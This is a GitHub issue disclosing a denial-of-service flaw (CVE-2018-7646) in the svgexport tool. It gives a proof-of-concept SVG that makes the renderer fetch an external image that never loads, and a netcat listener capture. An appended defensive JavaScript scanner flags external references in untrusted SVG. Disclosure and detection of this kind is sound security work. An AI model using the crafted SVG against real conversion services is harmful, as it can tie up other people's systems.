Denial of Service #55

Open
razbe opened this issue Mar 2, 2018 · 0 comments

razbe commented Mar 2, 2018

Hello, it looks like there is no timeout for loading an external image; this can lead to denial of service.
```xml
<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full"
     xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     xmlns:ev="http://www.w3.org/2001/xml-events">
  <defs>
    <pattern id="img1" patternUnits="userSpaceOnUse" width="600" height="450">
      <image xlink:href="http://127.0.0.1:1337" x="0" y="0" width="600" height="450" />
    </pattern>
  </defs>
  <path d="M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z" fill="url(#img1)" />
</svg>
```
Use netcat for example:

```
razbe@alpha:$ nc -lnvp 1337 && svgexport example.svg test.png
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [127.0.0.1] port 1337 [tcp/*] accepted (family 2, sport 45166)
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en-US,*
Host: 127.0.0.1:1337
```

CVE-2018-7646 was assigned.
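
A caller-side check for the pattern reported above, as an added example that is not part of the original issue or of the svgexport code base: it scans untrusted SVG text for references that would make the renderer fetch something, before the file is handed over. The function and constant names are hypothetical, and the scan is regex-based rather than a full XML parse, so it rejects anything that is not a plain `#fragment` or `data:` reference.

```javascript
// Added example, not svgexport code; all names are hypothetical.
// Fail closed: a reference is accepted only when it is a same-document
// fragment ("#id") or an inline data: URI. Anything else is reported.
function isLocalRef(value) {
  const v = value.trim();
  return v.startsWith('#') || /^data:/i.test(v);
}

function findExternalRefs(svgText) {
  const found = [];
  // href="..." / xlink:href='...' / src="..." attributes
  const attrRe = /(?:^|[\s"'])((?:xlink:)?href|src)\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  // CSS url(...) in presentation attributes, style="" and <style> blocks
  const urlRe = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)]*))\s*\)/gi;
  let m;
  while ((m = attrRe.exec(svgText)) !== null) {
    const value = m[2] ?? m[3];
    if (!isLocalRef(value)) found.push({ kind: m[1].toLowerCase(), value });
  }
  while ((m = urlRe.exec(svgText)) !== null) {
    const value = (m[1] ?? m[2] ?? m[3]).trim();
    if (!isLocalRef(value)) found.push({ kind: 'url()', value });
  }
  // Constructs that can bring in remote content by other routes
  for (const [kind, re] of [['@import', /@import/i],
                            ['xml-stylesheet', /<\?xml-stylesheet/i],
                            ['entity', /<!ENTITY/i]]) {
    if (re.test(svgText)) found.push({ kind, value: '' });
  }
  return found;
}

// The <pattern>/<image> reference from the report; path data abbreviated.
const REPORTED_SVG = `<svg xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink"><defs>
  <pattern id="img1" patternUnits="userSpaceOnUse" width="600" height="450">
  <image xlink:href="http://127.0.0.1:1337" x="0" y="0" width="600" height="450" />
  </pattern></defs><path d="M5,50 l0,100 z" fill="url(#img1)" /></svg>`;

// Constructed sample that uses only local references.
const LOCAL_ONLY_SVG = `<svg xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="data:image/png;base64,AAAA" width="1" height="1" />
  <use xlink:href="#img1" /><rect style="fill: url('#img1')" /></svg>`;

console.log(findExternalRefs(REPORTED_SVG));   // one finding: the <image> href
console.log(findExternalRefs(LOCAL_ONLY_SVG)); // []
```

A non-empty result means the file should not reach the renderer. Running the conversion under a wall-clock limit in the calling process covers references a text scan like this one misses.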
